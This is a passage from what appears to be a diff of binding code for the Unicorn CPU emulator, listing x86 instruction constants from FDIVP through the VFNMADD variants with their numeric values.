UC_X86_INS_FDIVP = 148 + let UC_X86_INS_DPPD = 149 + let UC_X86_INS_DPPS = 150 + let UC_X86_INS_RET = 151 + let UC_X86_INS_ENCLS = 152 + let UC_X86_INS_ENCLU = 153 + let UC_X86_INS_ENTER = 154 + let UC_X86_INS_EXTRACTPS = 155 + let UC_X86_INS_EXTRQ = 156 + let UC_X86_INS_F2XM1 = 157 + let UC_X86_INS_LCALL = 158 + let UC_X86_INS_LJMP = 159 + let UC_X86_INS_FBLD = 160 + let UC_X86_INS_FBSTP = 161 + let UC_X86_INS_FCOMPP = 162 + let UC_X86_INS_FDECSTP = 163 + let UC_X86_INS_FEMMS = 164 + let UC_X86_INS_FFREE = 165 + let UC_X86_INS_FICOM = 166 + let UC_X86_INS_FICOMP = 167 + let UC_X86_INS_FINCSTP = 168 + let UC_X86_INS_FLDCW = 169 + let UC_X86_INS_FLDENV = 170 
+ let UC_X86_INS_FLDL2E = 171 + let UC_X86_INS_FLDL2T = 172 + let UC_X86_INS_FLDLG2 = 173 + let UC_X86_INS_FLDLN2 = 174 + let UC_X86_INS_FLDPI = 175 + let UC_X86_INS_FNCLEX = 176 + let UC_X86_INS_FNINIT = 177 + let UC_X86_INS_FNOP = 178 + let UC_X86_INS_FNSTCW = 179 + let UC_X86_INS_FNSTSW = 180 + let UC_X86_INS_FPATAN = 181 + let UC_X86_INS_FPREM = 182 + let UC_X86_INS_FPREM1 = 183 + let UC_X86_INS_FPTAN = 184 + let UC_X86_INS_FFREEP = 185 + let UC_X86_INS_FRNDINT = 186 + let UC_X86_INS_FRSTOR = 187 + let UC_X86_INS_FNSAVE = 188 + let UC_X86_INS_FSCALE = 189 + let UC_X86_INS_FSETPM = 190 + let UC_X86_INS_FSINCOS = 191 + let UC_X86_INS_FNSTENV = 192 + let UC_X86_INS_FXAM = 193 + let UC_X86_INS_FXRSTOR = 194 + let UC_X86_INS_FXRSTOR64 = 195 + let UC_X86_INS_FXSAVE = 196 + let UC_X86_INS_FXSAVE64 = 197 + let UC_X86_INS_FXTRACT = 198 + let UC_X86_INS_FYL2X = 199 + let UC_X86_INS_FYL2XP1 = 200 + let UC_X86_INS_MOVAPD = 201 + let UC_X86_INS_MOVAPS = 202 + let UC_X86_INS_ORPD = 203 + let UC_X86_INS_ORPS = 204 + let UC_X86_INS_VMOVAPD = 205 + let UC_X86_INS_VMOVAPS = 206 + let UC_X86_INS_XORPD = 207 + let UC_X86_INS_XORPS = 208 + let UC_X86_INS_GETSEC = 209 + let UC_X86_INS_HADDPD = 210 + let UC_X86_INS_HADDPS = 211 + let UC_X86_INS_HLT = 212 + let UC_X86_INS_HSUBPD = 213 + let UC_X86_INS_HSUBPS = 214 + let UC_X86_INS_IDIV = 215 + let UC_X86_INS_FILD = 216 + let UC_X86_INS_IMUL = 217 + let UC_X86_INS_IN = 218 + let UC_X86_INS_INC = 219 + let UC_X86_INS_INSB = 220 + let UC_X86_INS_INSERTPS = 221 + let UC_X86_INS_INSERTQ = 222 + let UC_X86_INS_INSD = 223 + let UC_X86_INS_INSW = 224 + let UC_X86_INS_INT = 225 + let UC_X86_INS_INT1 = 226 + let UC_X86_INS_INT3 = 227 + let UC_X86_INS_INTO = 228 + let UC_X86_INS_INVD = 229 + let UC_X86_INS_INVEPT = 230 + let UC_X86_INS_INVLPG = 231 + let UC_X86_INS_INVLPGA = 232 + let UC_X86_INS_INVPCID = 233 + let UC_X86_INS_INVVPID = 234 + let UC_X86_INS_IRET = 235 + let UC_X86_INS_IRETD = 236 + let UC_X86_INS_IRETQ = 237 + let 
UC_X86_INS_FISTTP = 238 + let UC_X86_INS_FIST = 239 + let UC_X86_INS_FISTP = 240 + let UC_X86_INS_UCOMISD = 241 + let UC_X86_INS_UCOMISS = 242 + let UC_X86_INS_VCOMISD = 243 + let UC_X86_INS_VCOMISS = 244 + let UC_X86_INS_VCVTSD2SS = 245 + let UC_X86_INS_VCVTSI2SD = 246 + let UC_X86_INS_VCVTSI2SS = 247 + let UC_X86_INS_VCVTSS2SD = 248 + let UC_X86_INS_VCVTTSD2SI = 249 + let UC_X86_INS_VCVTTSD2USI = 250 + let UC_X86_INS_VCVTTSS2SI = 251 + let UC_X86_INS_VCVTTSS2USI = 252 + let UC_X86_INS_VCVTUSI2SD = 253 + let UC_X86_INS_VCVTUSI2SS = 254 + let UC_X86_INS_VUCOMISD = 255 + let UC_X86_INS_VUCOMISS = 256 + let UC_X86_INS_JAE = 257 + let UC_X86_INS_JA = 258 + let UC_X86_INS_JBE = 259 + let UC_X86_INS_JB = 260 + let UC_X86_INS_JCXZ = 261 + let UC_X86_INS_JECXZ = 262 + let UC_X86_INS_JE = 263 + let UC_X86_INS_JGE = 264 + let UC_X86_INS_JG = 265 + let UC_X86_INS_JLE = 266 + let UC_X86_INS_JL = 267 + let UC_X86_INS_JMP = 268 + let UC_X86_INS_JNE = 269 + let UC_X86_INS_JNO = 270 + let UC_X86_INS_JNP = 271 + let UC_X86_INS_JNS = 272 + let UC_X86_INS_JO = 273 + let UC_X86_INS_JP = 274 + let UC_X86_INS_JRCXZ = 275 + let UC_X86_INS_JS = 276 + let UC_X86_INS_KANDB = 277 + let UC_X86_INS_KANDD = 278 + let UC_X86_INS_KANDNB = 279 + let UC_X86_INS_KANDND = 280 + let UC_X86_INS_KANDNQ = 281 + let UC_X86_INS_KANDNW = 282 + let UC_X86_INS_KANDQ = 283 + let UC_X86_INS_KANDW = 284 + let UC_X86_INS_KMOVB = 285 + let UC_X86_INS_KMOVD = 286 + let UC_X86_INS_KMOVQ = 287 + let UC_X86_INS_KMOVW = 288 + let UC_X86_INS_KNOTB = 289 + let UC_X86_INS_KNOTD = 290 + let UC_X86_INS_KNOTQ = 291 + let UC_X86_INS_KNOTW = 292 + let UC_X86_INS_KORB = 293 + let UC_X86_INS_KORD = 294 + let UC_X86_INS_KORQ = 295 + let UC_X86_INS_KORTESTB = 296 + let UC_X86_INS_KORTESTD = 297 + let UC_X86_INS_KORTESTQ = 298 + let UC_X86_INS_KORTESTW = 299 + let UC_X86_INS_KORW = 300 + let UC_X86_INS_KSHIFTLB = 301 + let UC_X86_INS_KSHIFTLD = 302 + let UC_X86_INS_KSHIFTLQ = 303 + let UC_X86_INS_KSHIFTLW = 304 + let 
UC_X86_INS_KSHIFTRB = 305 + let UC_X86_INS_KSHIFTRD = 306 + let UC_X86_INS_KSHIFTRQ = 307 + let UC_X86_INS_KSHIFTRW = 308 + let UC_X86_INS_KUNPCKBW = 309 + let UC_X86_INS_KXNORB = 310 + let UC_X86_INS_KXNORD = 311 + let UC_X86_INS_KXNORQ = 312 + let UC_X86_INS_KXNORW = 313 + let UC_X86_INS_KXORB = 314 + let UC_X86_INS_KXORD = 315 + let UC_X86_INS_KXORQ = 316 + let UC_X86_INS_KXORW = 317 + let UC_X86_INS_LAHF = 318 + let UC_X86_INS_LAR = 319 + let UC_X86_INS_LDDQU = 320 + let UC_X86_INS_LDMXCSR = 321 + let UC_X86_INS_LDS = 322 + let UC_X86_INS_FLDZ = 323 + let UC_X86_INS_FLD1 = 324 + let UC_X86_INS_FLD = 325 + let UC_X86_INS_LEA = 326 + let UC_X86_INS_LEAVE = 327 + let UC_X86_INS_LES = 328 + let UC_X86_INS_LFENCE = 329 + let UC_X86_INS_LFS = 330 + let UC_X86_INS_LGDT = 331 + let UC_X86_INS_LGS = 332 + let UC_X86_INS_LIDT = 333 + let UC_X86_INS_LLDT = 334 + let UC_X86_INS_LMSW = 335 + let UC_X86_INS_OR = 336 + let UC_X86_INS_SUB = 337 + let UC_X86_INS_XOR = 338 + let UC_X86_INS_LODSB = 339 + let UC_X86_INS_LODSD = 340 + let UC_X86_INS_LODSQ = 341 + let UC_X86_INS_LODSW = 342 + let UC_X86_INS_LOOP = 343 + let UC_X86_INS_LOOPE = 344 + let UC_X86_INS_LOOPNE = 345 + let UC_X86_INS_RETF = 346 + let UC_X86_INS_RETFQ = 347 + let UC_X86_INS_LSL = 348 + let UC_X86_INS_LSS = 349 + let UC_X86_INS_LTR = 350 + let UC_X86_INS_XADD = 351 + let UC_X86_INS_LZCNT = 352 + let UC_X86_INS_MASKMOVDQU = 353 + let UC_X86_INS_MAXPD = 354 + let UC_X86_INS_MAXPS = 355 + let UC_X86_INS_MAXSD = 356 + let UC_X86_INS_MAXSS = 357 + let UC_X86_INS_MFENCE = 358 + let UC_X86_INS_MINPD = 359 + let UC_X86_INS_MINPS = 360 + let UC_X86_INS_MINSD = 361 + let UC_X86_INS_MINSS = 362 + let UC_X86_INS_CVTPD2PI = 363 + let UC_X86_INS_CVTPI2PD = 364 + let UC_X86_INS_CVTPI2PS = 365 + let UC_X86_INS_CVTPS2PI = 366 + let UC_X86_INS_CVTTPD2PI = 367 + let UC_X86_INS_CVTTPS2PI = 368 + let UC_X86_INS_EMMS = 369 + let UC_X86_INS_MASKMOVQ = 370 + let UC_X86_INS_MOVD = 371 + let UC_X86_INS_MOVDQ2Q = 372 + let 
UC_X86_INS_MOVNTQ = 373 + let UC_X86_INS_MOVQ2DQ = 374 + let UC_X86_INS_MOVQ = 375 + let UC_X86_INS_PABSB = 376 + let UC_X86_INS_PABSD = 377 + let UC_X86_INS_PABSW = 378 + let UC_X86_INS_PACKSSDW = 379 + let UC_X86_INS_PACKSSWB = 380 + let UC_X86_INS_PACKUSWB = 381 + let UC_X86_INS_PADDB = 382 + let UC_X86_INS_PADDD = 383 + let UC_X86_INS_PADDQ = 384 + let UC_X86_INS_PADDSB = 385 + let UC_X86_INS_PADDSW = 386 + let UC_X86_INS_PADDUSB = 387 + let UC_X86_INS_PADDUSW = 388 + let UC_X86_INS_PADDW = 389 + let UC_X86_INS_PALIGNR = 390 + let UC_X86_INS_PANDN = 391 + let UC_X86_INS_PAND = 392 + let UC_X86_INS_PAVGB = 393 + let UC_X86_INS_PAVGW = 394 + let UC_X86_INS_PCMPEQB = 395 + let UC_X86_INS_PCMPEQD = 396 + let UC_X86_INS_PCMPEQW = 397 + let UC_X86_INS_PCMPGTB = 398 + let UC_X86_INS_PCMPGTD = 399 + let UC_X86_INS_PCMPGTW = 400 + let UC_X86_INS_PEXTRW = 401 + let UC_X86_INS_PHADDSW = 402 + let UC_X86_INS_PHADDW = 403 + let UC_X86_INS_PHADDD = 404 + let UC_X86_INS_PHSUBD = 405 + let UC_X86_INS_PHSUBSW = 406 + let UC_X86_INS_PHSUBW = 407 + let UC_X86_INS_PINSRW = 408 + let UC_X86_INS_PMADDUBSW = 409 + let UC_X86_INS_PMADDWD = 410 + let UC_X86_INS_PMAXSW = 411 + let UC_X86_INS_PMAXUB = 412 + let UC_X86_INS_PMINSW = 413 + let UC_X86_INS_PMINUB = 414 + let UC_X86_INS_PMOVMSKB = 415 + let UC_X86_INS_PMULHRSW = 416 + let UC_X86_INS_PMULHUW = 417 + let UC_X86_INS_PMULHW = 418 + let UC_X86_INS_PMULLW = 419 + let UC_X86_INS_PMULUDQ = 420 + let UC_X86_INS_POR = 421 + let UC_X86_INS_PSADBW = 422 + let UC_X86_INS_PSHUFB = 423 + let UC_X86_INS_PSHUFW = 424 + let UC_X86_INS_PSIGNB = 425 + let UC_X86_INS_PSIGND = 426 + let UC_X86_INS_PSIGNW = 427 + let UC_X86_INS_PSLLD = 428 + let UC_X86_INS_PSLLQ = 429 + let UC_X86_INS_PSLLW = 430 + let UC_X86_INS_PSRAD = 431 + let UC_X86_INS_PSRAW = 432 + let UC_X86_INS_PSRLD = 433 + let UC_X86_INS_PSRLQ = 434 + let UC_X86_INS_PSRLW = 435 + let UC_X86_INS_PSUBB = 436 + let UC_X86_INS_PSUBD = 437 + let UC_X86_INS_PSUBQ = 438 + let UC_X86_INS_PSUBSB = 
439 + let UC_X86_INS_PSUBSW = 440 + let UC_X86_INS_PSUBUSB = 441 + let UC_X86_INS_PSUBUSW = 442 + let UC_X86_INS_PSUBW = 443 + let UC_X86_INS_PUNPCKHBW = 444 + let UC_X86_INS_PUNPCKHDQ = 445 + let UC_X86_INS_PUNPCKHWD = 446 + let UC_X86_INS_PUNPCKLBW = 447 + let UC_X86_INS_PUNPCKLDQ = 448 + let UC_X86_INS_PUNPCKLWD = 449 + let UC_X86_INS_PXOR = 450 + let UC_X86_INS_MONITOR = 451 + let UC_X86_INS_MONTMUL = 452 + let UC_X86_INS_MOV = 453 + let UC_X86_INS_MOVABS = 454 + let UC_X86_INS_MOVBE = 455 + let UC_X86_INS_MOVDDUP = 456 + let UC_X86_INS_MOVDQA = 457 + let UC_X86_INS_MOVDQU = 458 + let UC_X86_INS_MOVHLPS = 459 + let UC_X86_INS_MOVHPD = 460 + let UC_X86_INS_MOVHPS = 461 + let UC_X86_INS_MOVLHPS = 462 + let UC_X86_INS_MOVLPD = 463 + let UC_X86_INS_MOVLPS = 464 + let UC_X86_INS_MOVMSKPD = 465 + let UC_X86_INS_MOVMSKPS = 466 + let UC_X86_INS_MOVNTDQA = 467 + let UC_X86_INS_MOVNTDQ = 468 + let UC_X86_INS_MOVNTI = 469 + let UC_X86_INS_MOVNTPD = 470 + let UC_X86_INS_MOVNTPS = 471 + let UC_X86_INS_MOVNTSD = 472 + let UC_X86_INS_MOVNTSS = 473 + let UC_X86_INS_MOVSB = 474 + let UC_X86_INS_MOVSD = 475 + let UC_X86_INS_MOVSHDUP = 476 + let UC_X86_INS_MOVSLDUP = 477 + let UC_X86_INS_MOVSQ = 478 + let UC_X86_INS_MOVSS = 479 + let UC_X86_INS_MOVSW = 480 + let UC_X86_INS_MOVSX = 481 + let UC_X86_INS_MOVSXD = 482 + let UC_X86_INS_MOVUPD = 483 + let UC_X86_INS_MOVUPS = 484 + let UC_X86_INS_MOVZX = 485 + let UC_X86_INS_MPSADBW = 486 + let UC_X86_INS_MUL = 487 + let UC_X86_INS_MULPD = 488 + let UC_X86_INS_MULPS = 489 + let UC_X86_INS_MULSD = 490 + let UC_X86_INS_MULSS = 491 + let UC_X86_INS_MULX = 492 + let UC_X86_INS_FMUL = 493 + let UC_X86_INS_FIMUL = 494 + let UC_X86_INS_FMULP = 495 + let UC_X86_INS_MWAIT = 496 + let UC_X86_INS_NEG = 497 + let UC_X86_INS_NOP = 498 + let UC_X86_INS_NOT = 499 + let UC_X86_INS_OUT = 500 + let UC_X86_INS_OUTSB = 501 + let UC_X86_INS_OUTSD = 502 + let UC_X86_INS_OUTSW = 503 + let UC_X86_INS_PACKUSDW = 504 + let UC_X86_INS_PAUSE = 505 + let 
UC_X86_INS_PAVGUSB = 506 + let UC_X86_INS_PBLENDVB = 507 + let UC_X86_INS_PBLENDW = 508 + let UC_X86_INS_PCLMULQDQ = 509 + let UC_X86_INS_PCMPEQQ = 510 + let UC_X86_INS_PCMPESTRI = 511 + let UC_X86_INS_PCMPESTRM = 512 + let UC_X86_INS_PCMPGTQ = 513 + let UC_X86_INS_PCMPISTRI = 514 + let UC_X86_INS_PCMPISTRM = 515 + let UC_X86_INS_PCOMMIT = 516 + let UC_X86_INS_PDEP = 517 + let UC_X86_INS_PEXT = 518 + let UC_X86_INS_PEXTRB = 519 + let UC_X86_INS_PEXTRD = 520 + let UC_X86_INS_PEXTRQ = 521 + let UC_X86_INS_PF2ID = 522 + let UC_X86_INS_PF2IW = 523 + let UC_X86_INS_PFACC = 524 + let UC_X86_INS_PFADD = 525 + let UC_X86_INS_PFCMPEQ = 526 + let UC_X86_INS_PFCMPGE = 527 + let UC_X86_INS_PFCMPGT = 528 + let UC_X86_INS_PFMAX = 529 + let UC_X86_INS_PFMIN = 530 + let UC_X86_INS_PFMUL = 531 + let UC_X86_INS_PFNACC = 532 + let UC_X86_INS_PFPNACC = 533 + let UC_X86_INS_PFRCPIT1 = 534 + let UC_X86_INS_PFRCPIT2 = 535 + let UC_X86_INS_PFRCP = 536 + let UC_X86_INS_PFRSQIT1 = 537 + let UC_X86_INS_PFRSQRT = 538 + let UC_X86_INS_PFSUBR = 539 + let UC_X86_INS_PFSUB = 540 + let UC_X86_INS_PHMINPOSUW = 541 + let UC_X86_INS_PI2FD = 542 + let UC_X86_INS_PI2FW = 543 + let UC_X86_INS_PINSRB = 544 + let UC_X86_INS_PINSRD = 545 + let UC_X86_INS_PINSRQ = 546 + let UC_X86_INS_PMAXSB = 547 + let UC_X86_INS_PMAXSD = 548 + let UC_X86_INS_PMAXUD = 549 + let UC_X86_INS_PMAXUW = 550 + let UC_X86_INS_PMINSB = 551 + let UC_X86_INS_PMINSD = 552 + let UC_X86_INS_PMINUD = 553 + let UC_X86_INS_PMINUW = 554 + let UC_X86_INS_PMOVSXBD = 555 + let UC_X86_INS_PMOVSXBQ = 556 + let UC_X86_INS_PMOVSXBW = 557 + let UC_X86_INS_PMOVSXDQ = 558 + let UC_X86_INS_PMOVSXWD = 559 + let UC_X86_INS_PMOVSXWQ = 560 + let UC_X86_INS_PMOVZXBD = 561 + let UC_X86_INS_PMOVZXBQ = 562 + let UC_X86_INS_PMOVZXBW = 563 + let UC_X86_INS_PMOVZXDQ = 564 + let UC_X86_INS_PMOVZXWD = 565 + let UC_X86_INS_PMOVZXWQ = 566 + let UC_X86_INS_PMULDQ = 567 + let UC_X86_INS_PMULHRW = 568 + let UC_X86_INS_PMULLD = 569 + let UC_X86_INS_POP = 570 + let 
UC_X86_INS_POPAW = 571 + let UC_X86_INS_POPAL = 572 + let UC_X86_INS_POPCNT = 573 + let UC_X86_INS_POPF = 574 + let UC_X86_INS_POPFD = 575 + let UC_X86_INS_POPFQ = 576 + let UC_X86_INS_PREFETCH = 577 + let UC_X86_INS_PREFETCHNTA = 578 + let UC_X86_INS_PREFETCHT0 = 579 + let UC_X86_INS_PREFETCHT1 = 580 + let UC_X86_INS_PREFETCHT2 = 581 + let UC_X86_INS_PREFETCHW = 582 + let UC_X86_INS_PSHUFD = 583 + let UC_X86_INS_PSHUFHW = 584 + let UC_X86_INS_PSHUFLW = 585 + let UC_X86_INS_PSLLDQ = 586 + let UC_X86_INS_PSRLDQ = 587 + let UC_X86_INS_PSWAPD = 588 + let UC_X86_INS_PTEST = 589 + let UC_X86_INS_PUNPCKHQDQ = 590 + let UC_X86_INS_PUNPCKLQDQ = 591 + let UC_X86_INS_PUSH = 592 + let UC_X86_INS_PUSHAW = 593 + let UC_X86_INS_PUSHAL = 594 + let UC_X86_INS_PUSHF = 595 + let UC_X86_INS_PUSHFD = 596 + let UC_X86_INS_PUSHFQ = 597 + let UC_X86_INS_RCL = 598 + let UC_X86_INS_RCPPS = 599 + let UC_X86_INS_RCPSS = 600 + let UC_X86_INS_RCR = 601 + let UC_X86_INS_RDFSBASE = 602 + let UC_X86_INS_RDGSBASE = 603 + let UC_X86_INS_RDMSR = 604 + let UC_X86_INS_RDPMC = 605 + let UC_X86_INS_RDRAND = 606 + let UC_X86_INS_RDSEED = 607 + let UC_X86_INS_RDTSC = 608 + let UC_X86_INS_RDTSCP = 609 + let UC_X86_INS_ROL = 610 + let UC_X86_INS_ROR = 611 + let UC_X86_INS_RORX = 612 + let UC_X86_INS_ROUNDPD = 613 + let UC_X86_INS_ROUNDPS = 614 + let UC_X86_INS_ROUNDSD = 615 + let UC_X86_INS_ROUNDSS = 616 + let UC_X86_INS_RSM = 617 + let UC_X86_INS_RSQRTPS = 618 + let UC_X86_INS_RSQRTSS = 619 + let UC_X86_INS_SAHF = 620 + let UC_X86_INS_SAL = 621 + let UC_X86_INS_SALC = 622 + let UC_X86_INS_SAR = 623 + let UC_X86_INS_SARX = 624 + let UC_X86_INS_SBB = 625 + let UC_X86_INS_SCASB = 626 + let UC_X86_INS_SCASD = 627 + let UC_X86_INS_SCASQ = 628 + let UC_X86_INS_SCASW = 629 + let UC_X86_INS_SETAE = 630 + let UC_X86_INS_SETA = 631 + let UC_X86_INS_SETBE = 632 + let UC_X86_INS_SETB = 633 + let UC_X86_INS_SETE = 634 + let UC_X86_INS_SETGE = 635 + let UC_X86_INS_SETG = 636 + let UC_X86_INS_SETLE = 637 + let 
UC_X86_INS_SETL = 638 + let UC_X86_INS_SETNE = 639 + let UC_X86_INS_SETNO = 640 + let UC_X86_INS_SETNP = 641 + let UC_X86_INS_SETNS = 642 + let UC_X86_INS_SETO = 643 + let UC_X86_INS_SETP = 644 + let UC_X86_INS_SETS = 645 + let UC_X86_INS_SFENCE = 646 + let UC_X86_INS_SGDT = 647 + let UC_X86_INS_SHA1MSG1 = 648 + let UC_X86_INS_SHA1MSG2 = 649 + let UC_X86_INS_SHA1NEXTE = 650 + let UC_X86_INS_SHA1RNDS4 = 651 + let UC_X86_INS_SHA256MSG1 = 652 + let UC_X86_INS_SHA256MSG2 = 653 + let UC_X86_INS_SHA256RNDS2 = 654 + let UC_X86_INS_SHL = 655 + let UC_X86_INS_SHLD = 656 + let UC_X86_INS_SHLX = 657 + let UC_X86_INS_SHR = 658 + let UC_X86_INS_SHRD = 659 + let UC_X86_INS_SHRX = 660 + let UC_X86_INS_SHUFPD = 661 + let UC_X86_INS_SHUFPS = 662 + let UC_X86_INS_SIDT = 663 + let UC_X86_INS_FSIN = 664 + let UC_X86_INS_SKINIT = 665 + let UC_X86_INS_SLDT = 666 + let UC_X86_INS_SMSW = 667 + let UC_X86_INS_SQRTPD = 668 + let UC_X86_INS_SQRTPS = 669 + let UC_X86_INS_SQRTSD = 670 + let UC_X86_INS_SQRTSS = 671 + let UC_X86_INS_FSQRT = 672 + let UC_X86_INS_STAC = 673 + let UC_X86_INS_STC = 674 + let UC_X86_INS_STD = 675 + let UC_X86_INS_STGI = 676 + let UC_X86_INS_STI = 677 + let UC_X86_INS_STMXCSR = 678 + let UC_X86_INS_STOSB = 679 + let UC_X86_INS_STOSD = 680 + let UC_X86_INS_STOSQ = 681 + let UC_X86_INS_STOSW = 682 + let UC_X86_INS_STR = 683 + let UC_X86_INS_FST = 684 + let UC_X86_INS_FSTP = 685 + let UC_X86_INS_FSTPNCE = 686 + let UC_X86_INS_FXCH = 687 + let UC_X86_INS_SUBPD = 688 + let UC_X86_INS_SUBPS = 689 + let UC_X86_INS_FSUBR = 690 + let UC_X86_INS_FISUBR = 691 + let UC_X86_INS_FSUBRP = 692 + let UC_X86_INS_SUBSD = 693 + let UC_X86_INS_SUBSS = 694 + let UC_X86_INS_FSUB = 695 + let UC_X86_INS_FISUB = 696 + let UC_X86_INS_FSUBP = 697 + let UC_X86_INS_SWAPGS = 698 + let UC_X86_INS_SYSCALL = 699 + let UC_X86_INS_SYSENTER = 700 + let UC_X86_INS_SYSEXIT = 701 + let UC_X86_INS_SYSRET = 702 + let UC_X86_INS_T1MSKC = 703 + let UC_X86_INS_TEST = 704 + let UC_X86_INS_UD2 = 705 + let 
UC_X86_INS_FTST = 706 + let UC_X86_INS_TZCNT = 707 + let UC_X86_INS_TZMSK = 708 + let UC_X86_INS_FUCOMPI = 709 + let UC_X86_INS_FUCOMI = 710 + let UC_X86_INS_FUCOMPP = 711 + let UC_X86_INS_FUCOMP = 712 + let UC_X86_INS_FUCOM = 713 + let UC_X86_INS_UD2B = 714 + let UC_X86_INS_UNPCKHPD = 715 + let UC_X86_INS_UNPCKHPS = 716 + let UC_X86_INS_UNPCKLPD = 717 + let UC_X86_INS_UNPCKLPS = 718 + let UC_X86_INS_VADDPD = 719 + let UC_X86_INS_VADDPS = 720 + let UC_X86_INS_VADDSD = 721 + let UC_X86_INS_VADDSS = 722 + let UC_X86_INS_VADDSUBPD = 723 + let UC_X86_INS_VADDSUBPS = 724 + let UC_X86_INS_VAESDECLAST = 725 + let UC_X86_INS_VAESDEC = 726 + let UC_X86_INS_VAESENCLAST = 727 + let UC_X86_INS_VAESENC = 728 + let UC_X86_INS_VAESIMC = 729 + let UC_X86_INS_VAESKEYGENASSIST = 730 + let UC_X86_INS_VALIGND = 731 + let UC_X86_INS_VALIGNQ = 732 + let UC_X86_INS_VANDNPD = 733 + let UC_X86_INS_VANDNPS = 734 + let UC_X86_INS_VANDPD = 735 + let UC_X86_INS_VANDPS = 736 + let UC_X86_INS_VBLENDMPD = 737 + let UC_X86_INS_VBLENDMPS = 738 + let UC_X86_INS_VBLENDPD = 739 + let UC_X86_INS_VBLENDPS = 740 + let UC_X86_INS_VBLENDVPD = 741 + let UC_X86_INS_VBLENDVPS = 742 + let UC_X86_INS_VBROADCASTF128 = 743 + let UC_X86_INS_VBROADCASTI32X4 = 744 + let UC_X86_INS_VBROADCASTI64X4 = 745 + let UC_X86_INS_VBROADCASTSD = 746 + let UC_X86_INS_VBROADCASTSS = 747 + let UC_X86_INS_VCMPPD = 748 + let UC_X86_INS_VCMPPS = 749 + let UC_X86_INS_VCMPSD = 750 + let UC_X86_INS_VCMPSS = 751 + let UC_X86_INS_VCOMPRESSPD = 752 + let UC_X86_INS_VCOMPRESSPS = 753 + let UC_X86_INS_VCVTDQ2PD = 754 + let UC_X86_INS_VCVTDQ2PS = 755 + let UC_X86_INS_VCVTPD2DQX = 756 + let UC_X86_INS_VCVTPD2DQ = 757 + let UC_X86_INS_VCVTPD2PSX = 758 + let UC_X86_INS_VCVTPD2PS = 759 + let UC_X86_INS_VCVTPD2UDQ = 760 + let UC_X86_INS_VCVTPH2PS = 761 + let UC_X86_INS_VCVTPS2DQ = 762 + let UC_X86_INS_VCVTPS2PD = 763 + let UC_X86_INS_VCVTPS2PH = 764 + let UC_X86_INS_VCVTPS2UDQ = 765 + let UC_X86_INS_VCVTSD2SI = 766 + let UC_X86_INS_VCVTSD2USI = 
767 + let UC_X86_INS_VCVTSS2SI = 768 + let UC_X86_INS_VCVTSS2USI = 769 + let UC_X86_INS_VCVTTPD2DQX = 770 + let UC_X86_INS_VCVTTPD2DQ = 771 + let UC_X86_INS_VCVTTPD2UDQ = 772 + let UC_X86_INS_VCVTTPS2DQ = 773 + let UC_X86_INS_VCVTTPS2UDQ = 774 + let UC_X86_INS_VCVTUDQ2PD = 775 + let UC_X86_INS_VCVTUDQ2PS = 776 + let UC_X86_INS_VDIVPD = 777 + let UC_X86_INS_VDIVPS = 778 + let UC_X86_INS_VDIVSD = 779 + let UC_X86_INS_VDIVSS = 780 + let UC_X86_INS_VDPPD = 781 + let UC_X86_INS_VDPPS = 782 + let UC_X86_INS_VERR = 783 + let UC_X86_INS_VERW = 784 + let UC_X86_INS_VEXP2PD = 785 + let UC_X86_INS_VEXP2PS = 786 + let UC_X86_INS_VEXPANDPD = 787 + let UC_X86_INS_VEXPANDPS = 788 + let UC_X86_INS_VEXTRACTF128 = 789 + let UC_X86_INS_VEXTRACTF32X4 = 790 + let UC_X86_INS_VEXTRACTF64X4 = 791 + let UC_X86_INS_VEXTRACTI128 = 792 + let UC_X86_INS_VEXTRACTI32X4 = 793 + let UC_X86_INS_VEXTRACTI64X4 = 794 + let UC_X86_INS_VEXTRACTPS = 795 + let UC_X86_INS_VFMADD132PD = 796 + let UC_X86_INS_VFMADD132PS = 797 + let UC_X86_INS_VFMADDPD = 798 + let UC_X86_INS_VFMADD213PD = 799 + let UC_X86_INS_VFMADD231PD = 800 + let UC_X86_INS_VFMADDPS = 801 + let UC_X86_INS_VFMADD213PS = 802 + let UC_X86_INS_VFMADD231PS = 803 + let UC_X86_INS_VFMADDSD = 804 + let UC_X86_INS_VFMADD213SD = 805 + let UC_X86_INS_VFMADD132SD = 806 + let UC_X86_INS_VFMADD231SD = 807 + let UC_X86_INS_VFMADDSS = 808 + let UC_X86_INS_VFMADD213SS = 809 + let UC_X86_INS_VFMADD132SS = 810 + let UC_X86_INS_VFMADD231SS = 811 + let UC_X86_INS_VFMADDSUB132PD = 812 + let UC_X86_INS_VFMADDSUB132PS = 813 + let UC_X86_INS_VFMADDSUBPD = 814 + let UC_X86_INS_VFMADDSUB213PD = 815 + let UC_X86_INS_VFMADDSUB231PD = 816 + let UC_X86_INS_VFMADDSUBPS = 817 + let UC_X86_INS_VFMADDSUB213PS = 818 + let UC_X86_INS_VFMADDSUB231PS = 819 + let UC_X86_INS_VFMSUB132PD = 820 + let UC_X86_INS_VFMSUB132PS = 821 + let UC_X86_INS_VFMSUBADD132PD = 822 + let UC_X86_INS_VFMSUBADD132PS = 823 + let UC_X86_INS_VFMSUBADDPD = 824 + let UC_X86_INS_VFMSUBADD213PD = 825 + let 
UC_X86_INS_VFMSUBADD231PD = 826 + let UC_X86_INS_VFMSUBADDPS = 827 + let UC_X86_INS_VFMSUBADD213PS = 828 + let UC_X86_INS_VFMSUBADD231PS = 829 + let UC_X86_INS_VFMSUBPD = 830 + let UC_X86_INS_VFMSUB213PD = 831 + let UC_X86_INS_VFMSUB231PD = 832 + let UC_X86_INS_VFMSUBPS = 833 + let UC_X86_INS_VFMSUB213PS = 834 + let UC_X86_INS_VFMSUB231PS = 835 + let UC_X86_INS_VFMSUBSD = 836 + let UC_X86_INS_VFMSUB213SD = 837 + let UC_X86_INS_VFMSUB132SD = 838 + let UC_X86_INS_VFMSUB231SD = 839 + let UC_X86_INS_VFMSUBSS = 840 + let UC_X86_INS_VFMSUB213SS = 841 + let UC_X86_INS_VFMSUB132SS = 842 + let UC_X86_INS_VFMSUB231SS = 843 + let UC_X86_INS_VFNMADD132PD = 844 + let UC_X86_INS_VFNMADD132PS = 845 + let UC_X86_INS_VFNMADDPD = 846 + let UC_X86_INS_VFNMADD213PD = 847 + let UC_X86_INS_VFNMADD231PD = 848 + let UC_X86_INS_VFNMADDPS = 849 + let UC_X86_INS_VFNMADD213PS = 850 + let UC_X86_INS_VFNMADD231PS = 851 + let UC_X86_INS_VFNMADDSD = 852 + let UC_X86_INS_VFNMADD213SD = 853 + let UC_X86_INS_VFNMADD132SD = 854 + let UC_X86_INS_VFNMADD231SD = 855 + let UC_X86_INS_VFNMADDSS = 856 + let UC_X86_INS_VFNMADD213SS = 857 + let UC_X86_INS_VFNMADD132SS = 858 + let 